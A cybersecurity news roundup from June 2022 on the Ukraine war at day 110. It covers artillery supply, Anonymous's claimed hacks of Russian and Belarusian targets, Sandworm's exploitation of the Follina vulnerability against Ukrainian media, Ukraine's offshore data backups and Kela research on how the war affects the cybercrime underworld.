Ukraine at D+110: Hacktivists, spies, and cyber criminals.
N2K logoJun 14, 2022

Supplying an artillery war, as Russia seeks to conquer rubble. Anonymous makes some large claims about its actions against Russia and Belarus. GRU's Sandworm exploits the Follina vulnerability against Ukrainian media organizations. Ukraine is backing up sensitive data abroad. And a study released this morning looks at the challenges and opportunities Russia's war has presented the cyber criminal underworld.

Ukraine at D+110: Hacktivists, spies, and cyber criminals.

Russia continues to expend ammunition at a prodigious rate in the Donbas, which has emerged as the decisive theater of the war. Task & Purpose claims 60,000 shells and rockets are being expended daily, which is a great deal, although not an unprecedented bombardment by 20th Century standards. Retired US General David Petraeus characterized the tactics to Task & Purpose: “When they confront a particularly determined and skillful urban defense, they pound it with artillery, rockets, missiles, and bombs until it is totally destroyed and ‘depopulated. They then secure the rubble and move forward until they encounter further determined defenders and repeat the process. This is, of course, why the Ukrainians have described this phase of the war as heavily artillery-centric — and why it is so important that the U.S. and other western countries expeditiously provide as much artillery, ammunition, drones, loitering munitions, counterfire radars, multiple-launch rocket systems and rockets, and other relevant capabilities (including trucks to carry the ammo) as the Ukrainians can possibly absorb and employ.”

Newsweek summarizes the materiel Ukraine has requested from sympathetic countries: "1,000 howitzers caliber 155 mm, 300 MLRS (M270 Multiple Launch Rocket System), 500 tanks, 2,000 armored vehicles, and 1,000 drones."

This morning's situation report from the UK's Ministry of Defence (MoD) notes the continuing Russian concentration on Sieverodonetsk, but focuses on the challenges of industrial mobilization for a long war. "Russia's operational main effort remains the assault against the Sieverodonetsk pocket in the Donbas and its Western Group of forces have likely made small advances in the Kharkiv sector for the first time in several weeks. On 10 June, the First Deputy Chairman of Russia's Military Industrial Commission predicted that state defence spending will increase by 600-700 billion roubles (GBP 8.5 -10 billion), which could approach a 20% increase in Russia's defence budget. Russian government funding is allowing the country's defence industrial base to be slowly mobilised to meet demands placed on it by the war in Ukraine. However, the industry could struggle to meet many of these requirements, partially due to the effects of sanctions and lack of expertise. Russia's production of high-quality optics and advanced electronics likely remain troubled and could undermine its efforts to replace equipment lost in Ukraine."

Anonymous claims to have hacked Russia's drone suppliers...

Anonymous claims to have successfully hacked into Russia's drone suppliers, if not exactly the drones themselves. "Russian UAV drones plans and tactic's hacked. We hope this information will help the war to end as soon as possible , no war is justified! [sic]" tweeted @Spid3r, who claims adherence to the hacktivist collective. Accounts of exactly what Anonymous obtained are confused and unclear, but it does not appear to have been a "direct attack on the Russian military," as some sources said. Images @Spird3r posted of files allegedly stolen appear to include promotional literature and a list of companies involved in the production or trade of the Kronstadt Group's Orion-E armed drone, an export model. Computing notes, sensibly, that "The nature of Anonymous makes it impossible to ascertain if the hacked data is genuine, although cybersecurity experts do think that most of the collective claims of successful attacks are true."

...and to have hit sensitive targets in Belarus.

@Spid3r also claims to have engineered significant disruption of government activities in Belarus. "Access to 26 ministries, centers and banks of the Belarusian Government has been restricted as a result of attacks by me (@YourAnonSpider)" the hacktivist crowed on Twitter. There are no independent reports of such activity, which have to be received with skepticism. Somebody would surely have noticed such widespread disturbances.

Ukraine moves sensitive data abroad.

The Wall Street Journal reports that Ukraine has begun to store sensitive data abroad, backing up its information to render it less vulnerable to Russian physical or cyber attack. George Dubinskiy, the country's deputy minister of digital transformation, said, “To be on the safe side, we want to have our backups abroad.” Among the earlier transfers was a program to back data up to a secure private cloud with servers located in Poland. Priority has been given to protecting "VIP" databases, that is, databases deemed essential to the operation of Ukraine's economy.

Dealing with the GRU's exploitation of the Follina vulnerabilities.

CERT-UA maintains its conclusion that Sandworm, a GRU operation, was responsible for exploiting Follina to compromise Ukrainian media organizations, Computing reports. Compromised Word documents are carrying the AsyncRAT Trojan as a malicious payload.

Follina is a remote code execution vulnerability (CVE-2022-30190, assigned a severity rating of 7.8 out of 10 by Microsoft) that uses the Microsoft Support Diagnostic Tool (MSDT) to download and execute malicious script. It's being called "low-interaction remote code execution," not zero-click, because there's some interaction required for execution, but not much. All it takes is for a victim to preview a malicious file. Ars Technica notes that Microsoft has issued instructions for mitigation, explaining how to disable MSDT, but hasn't yet said whether it will issue a full patch for the issue.

The war's effects on the cyber underworld.

Kela Cybercrime Intelligence has researched the effect Russia’s war against Ukraine has been having on the cybercrime landscape, detailing new developments in the cybercriminal underground as a result of the conflict. The effects are being produced by new criminal opportunities, by the effect of Western sanctions, and by new Russian restrictions on certain online services.

Kela researchers have found, for example, that people are getting transportation out of Ukraine through hacking sites, rather than through legitimate sites and services, and there has been an increase in demand for money transfer services, as both Russia and Ukraine now have laws in place dictating limits on the amounts that can be transferred, and the locations to which money may be transferred. These are the traditional services black markets have traditionally offered in wartime, and cyber criminals have not been slow to pivot from online fraud and carding to taking advantage of the desperate.

What’s made legitimate remittances harder has also made criminal transactions more difficult. The blind eye the Russian organs have traditionally turned toward money laundering, for example, is now seeing a bit more clearly, and life has grown a bit more challenging for the underworld. And, of course, Western sanctions have made it difficult, in some cases difficult to the point of impossibility, for, say ransomware victims to pay their extortionists, especially when the ransomware operators are working from Russia, as so many of them do.

VPN services have also seen a “spike” in demand. “The spike can be caused by the arrival of new users hoping to acquire accounts for reliable VPN services,” Kela writes, “especially since Russia has started to block URLs linked to some of them, while to legally pay for remaining VPNs is hard without having non-Russia issued Visa and MasterCard credit cards.” There’s nothing inherently illegal about VPNs, but they’re restricted in Russia, where the government has enacted censorship laws to stifle access to sites that offer what the Kremlin regards as “disinformation,” that is, comment and reporting that don’t reflect the official Russian line on the special military operation. Facebook and Instagram are among the platforms being censored, and the cyber underworld has been quick to offer illicit VPN services to those who want to see the news the government would rather go unreported (or at least unheard).

Kela has also found that the war is affecting both cybercriminal online communities and C2C markets for ransomware and other crimeware. The actors behind the Raccoon Stealer malware reported on a forum that their core developers are unable to continue to produce the malware because of a “special operation” and that work on Raccoon Stealer has been suspended. The gang hints that the suspension is due to the war. Chatter about the effects of the war has also appeared on the Russophone cybercrime forum. There’s some debate there about the nature and justification of Russia’s war, despite the forum’s rules against such political discussion. And, of course, as we’ve seen, ransomware gangs have taken sides in the war, usually Russia’s side. (Conti is the most famous of these.) Some of the gangs, wishing for freedom to pursue criminal gain, have sought to keep operations as normal as possible by declaring their neutrality.